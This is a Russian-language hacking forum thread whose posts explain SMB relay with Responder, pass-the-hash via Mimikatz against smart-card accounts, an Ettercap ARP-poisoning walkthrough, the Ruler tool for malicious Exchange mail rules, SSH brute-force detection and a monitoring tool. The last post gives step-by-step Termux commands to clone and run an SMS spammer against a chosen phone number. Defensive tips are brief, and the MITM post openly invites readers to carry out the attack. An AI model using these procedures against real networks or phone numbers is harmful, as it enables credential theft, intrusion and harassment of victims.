https://docs.microsoft.com/ru-ru/security-updates/SecurityBulletins/2008/ms08-068?redirectedfrom=MSDN А операционная система получила обновление. Имея данное обновление, злоумышленник не сможет провернуть данную атаку. Однако другие домены в узле можно атаковать, только с условием, что на домене отсутствует подпись пактов SMB Как легко хакеры проводят данную атаку можно увидеть своими глазами, из результатов пентеста. Сканируя сетевой трафик, был замечен компьютер, запрашивающий информацию с другого узла, обратно пересылая HTTP-пртоколы. Используя программу Responder легко атакуется подобный уязвимый узел, сделав всего лишь запрос подключения с узла, который делал запросы компьютеру. Это позволяет использовать все возможности юзера, которые он имел во время проведения аутентификации. В данном моменте удалось заполучить абсолютный контроль над сервером. Не забывайте, провести подобную атаку легко. В больших компаниях, обычно, используются определенные системы, которые работаю со всей информацией и выполняет определенные задачи. Это означает, что подобные системы ежесекундно перенаправляют огромное количество данных через узлы, что позволяет хакерам использовать данный вид атаки. Защита от атаки Защититься тоже не является проблемой, делается при помощи использования SMB-пакетов, подключенных ко всем уязвимым узлам системы, а также отключение первых двух протоколов, указанных в начале статьи.
  20. Зайти в Windows можно при помощи паролей или же благодаря смарт-картам. Администратор проводит настройку таким образом, чтобы компьютер делал запрос на определенную смарт-карту, которая дает доступ к Операционной системе. Метод двухфакторной аутентификации заключается в том, что человек должен знать не только какой-либо код доступа, но и обладать вещью для разблокировки, в данном случае – смарт-карта. Только при необходимом сертификате смарт-карта даст возможность ввода пин-кода, после чего пользователь может запустить операционку. Во время настройки пользователя, на домен устанавливается атрибут, который необходим для работы аутентификации с помощью смарт-карты, к данному пользователю приписывается какой-то NT-хэш. Значения данного хэша устанавливается случайно и в будущем никак не изменяются. Контроллер домена во время проведения аутентификации пересылает данный хэш в узел, подключение к которому производится. Атака Pass the hash Уязвимость работает по данному принципу: мошенник получает тот самый NT-хэш и благодаря нему проводит аутентификацию, используя способ pass the hash. Узнав данную информацию, злоумышленнику не нужно будет иметь смарт-карту или пин-код для получения доступа. А т.к. хэш в будущем неизменен, то злоумышленник получается возможность подключаться к ресурсам в любой момент времени. Для получения хэша используется инструмент Mimikatz прямо на сетевых узлах, со сценариями от 1 до 3. Помимо хэша и соответственно пароля учетной записи, можно узнать реальный пин-код смарт-карты. Запуская на сетевых узлах инструмент Mimikatz, появляется возможность копирования всех данных с привилегированных учетных записей, даже в случае использования двухфакторной аутентификации. Авторизация в данной операционной система построена так, что не получив прямого доступа к пользователю администратора, он получит хэш. А если он неизменен, то позволяет использовать его на прочих узлах сети. Данный методы дают возможность использования атаки и обхода данного метода защиты. Защита от уязвимости Windows 10 имеет в своем арсенале Remote Credential Guard, необходимая для защиты пользователей, во время удаленной работы. Данная вещь повышает безопасность, при попытке использования атаки.
  21. Привет, хакеры, в статье расскажу о программе написанной на языке Python, которая помогает расширить существующий набор инструментов мониторинга безопасности рабочих станций или серверов, а также для автоматизирования быстрого сканирования вирусов. Режимы Распознавание последней точкиСканирование вирусовЖурналы событийSysmonWatchdogTShark Принцип работы: 1. Уведомление приходит из одного источников перечисленных выше. 2. Уведомление проходит проверку на валидность в config / ecxeptions / exception.json, где находятся все уведомления, на которые не нужно обращаться внимания. Если необходимо распознать последнюю точку, то необходимые уведомления игнорируется при помощи ПО. Чтобы сканировать вирусы нужно вручную добавить исключения в систему. 3. Если уведомление есть в exception.json, то возвращаемся к первому пункту, если нет, то идем дальше. 4. Если включен режим обучения, то появляется окно с предупреждением, где у вас спрашивают, собираетесь ли вы игнорировать уведомление, если да, то прописываем все данные для этого. 5. Если хотите пропустить выбор исключений, то переходим к следующему шагу. 6. Уведомление юзера о времени захвата. Делаем вывод: Уведомление в виде всплывающего окно появляется только, если работает мышь и компьютер ничем не блокируется. Все предупреждения сохраняются в виде текстового файла с расширением .txt Скачать данную программу и подробнее ознакомится с ней, можно по ссылке - https://github.com/yarox24/attack_monitor#supported-os
  22. Ettercap – программа предназначенная для сканирования сетевого трафика, который проходит через ПК, имея специальные опции. Приложение способно проводить атаки “man in the middle”, которое вынуждает другое устройство отсылать пакеты не роутеру, а прямо вам. Wireshark – популярная утилита, позволяющая перехватывать и сканировать трафик, является стандартной программой для образования и troubleshooting. Она поддерживает огромное множество протоколов, что делает ее универсальным инструментом, прибавляя к этому удобный интерфейс и сильнейшие фильтры Атака “Man In The Middle” – одна из атак криптографии, при которой взломщик крадет и изменяем сообщения, используемые для обмена информацией между корреспондентами, примечательно тем, что никто не догадывается об изменениях. Итак, первым делом необходимо установить подключение с сетью. Далее включаем первую программу, она имеет собственный интерфейс. Необходимо узнать, какие ип-адреса подключены к данной сети. Переходим в Sniff и там выбираем unified sniffing В данном разделе необходимо определиться с типом сети, которая будет отслежена. Нам необходима беспроводная сеть. Готово, теперь доступен специальный функционал. Необходимо выбрать Host, далее Scan for hosts. Когда сканирование будет завершено, переходим в список всех хостов, найденных на данном этапе. Что их увидеть переходим в Hosts – Hosts list Здесь выбираем: 1. Ип-адреса, необходимые для отслеживания 2. Устанавливаем слежу на них, нажатием Add to Target 1 и Add to Target 2 Далее входим в Mitm – ARP poisoning, где включаем опцию sniff remote connections, и конечно же начинаем отслеживание, нажав на кнопку Start Теперь запускаем вторую программу списка – Wireshark Данный способ атаки, совершаемый именно этими инструментами, можно совершать только на сайты, находящиеся на незащищенном протоколе – http. С протоколом https не выйдет. Не забывайте, что подключаясь к общественной сети, тоже можете подвергнутся хакерской атаке. Методы защиты: 1. Не допускайте возможности подключения к вашей сети неизвестных 2. Во время использования общественных сетей, не забывайте об возможно кражи ваших паролей. 3. Пользуйтесь VPN, подобные технологии помогут обезопасить вас от множества видов атак 4. Лучший способ защиты – сертификат SSL Надеюсь информация полезна и поможет вам избежать подобных атак или успешно провести их. К действиям не призываю!
  23. Всем привет, брут-атака это упорядоченная проверка и подбор всех возможных вариаций паролей, пока правильный не будет обнаружен. Если нахождение хоста прямо в сети и там же находится служба SSH, то такой хост всегда будет подвергнут атакам брутфорс, которые выполняются в автоматическом порядке, для этого существует скрипт - hydra. Чтобы обнаружить начало брутфорс-атака на службы SSH вашего хоста, которые запускаются при помощи менеджеров систему – system, туда входят: CentOS7, Fedora21 и RHEL7, для них используется команда journalctl, имея данные параметры: Древние системы, держащиеся на основе RedHat, используя upstart, а именно – CentOS6 и RHEL6, можно обнаруживать попытки атаки в просмотре непосредственно файла: Отлично, мы узнали ип-адрес хакера, пытающийся провести брутфорс атаку, использовав сервис whois узнаем его местоположение. Служба whois дает информацию и выполняет поиск объекта в специальной базе данных для данного ип-адреса. Теперь посмотрим информацию об интернет-провайдере злоумышленника, для возможности связи с ними и выведении из строя данного пользователя, чтобы больше он не имел возможности атаковать сервера. Отлично, узнав информацию о провайдере можно написать письмо на их электронную почту, где указать все необходимые данные пользователя и сделать запрос на дальнейшую блокировку данного клиента.
  24. Всем привет, данная статья будет совсем не большой и даже не очень информативной. Но надеюсь я смогу донести до вас крупицу информации и это возможно натолкнет вас на дальнейшее изучение данной тематики и подобных инструментов. Итак, Ruler является инструментом, написанном на таком языке программирования, как Go (скорее всего никто о нем не знает), необходим он для взаимосвязи с Exchange-серверами при помощи протоколы HTTP и MAPI. Главной задачей является злоупотребление правилами почты на основе Outlook клиента, об этом было написано в данном блоге - https://silentbreaksecurity.com/malicious-outlook-rules/ Особенности инструмента: Пересчет действительных юзеровПросмотр свежих правил настроек почтыСоздание новейших вирусных правил почтыУничтожение определенных правил почты Включая это, Ruler пытается в режиме полуавтомата устанавливать взаимосвязь с Exchange, а также пользоваться сервисом Autodiscover, чтобы обнаружить нужные данные. Вот один из подобных примером брут-атаки: А также как пример получения shell Написал все, что планировал, если вы собираетесь дальше ознакомиться с этим, то можно почитать об этом в блоге создателей данной программы, ссылочка - https://sensepost.com/blog/2016/mapi-over-http-and-mailrule-pwnage/
  25. Всем привет, сегодня будет совсем небольшая статья. И сразу учтите тот факт, что любые спам-атаки приводят к различным сбоям системы, из-за чего могут уничтожится данные, а это является нарушение закона. Эта статья написана только для ознакомления, а также возможного предотвращения этих же атак, я вас предупредил. Итак, для проведения атаки нам понадобится доступ в интернет, телефон с андройдом и эмулятор терминала Linux – Termux. Установка всех нужных компонентов для проведения атаки на Андройде Сначала мы перемещаемся в Play Market и проводим установку Termux После открытия приложения вписываем данный код: Clearpkg updatepkg install gitpkg install pythonpkg install python2pip2 install requestsgit clone https://github.com/WattanaGaming/Spammer-Grab-1lschmod +x Spammer-Grab-1lscd Spammer-Grab-1lschmod 777 spammer.pypython2 spammer.py (phone number)Уже почти все, далее нам нужно запустить этот спамер. Делается это с помощью данного кода: python2 spammer.py номер Чтобы спам прекратить, вам нужно всего лишь выйти из программы. Ко всему прочему в этой программе можно запустить сразу несколько спамеров, делается это легко, просто свайпаете вправо и нажимаете на кнопку New session, после чего вводите: cd Spammer-Grab-1 python2 spammer.py номер Чтобы уменьшить задержку прописываем это: python2 spammer.py --delay задержка номер Примечание: Не забудьте о том, что номер нужно вводить без знака +
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.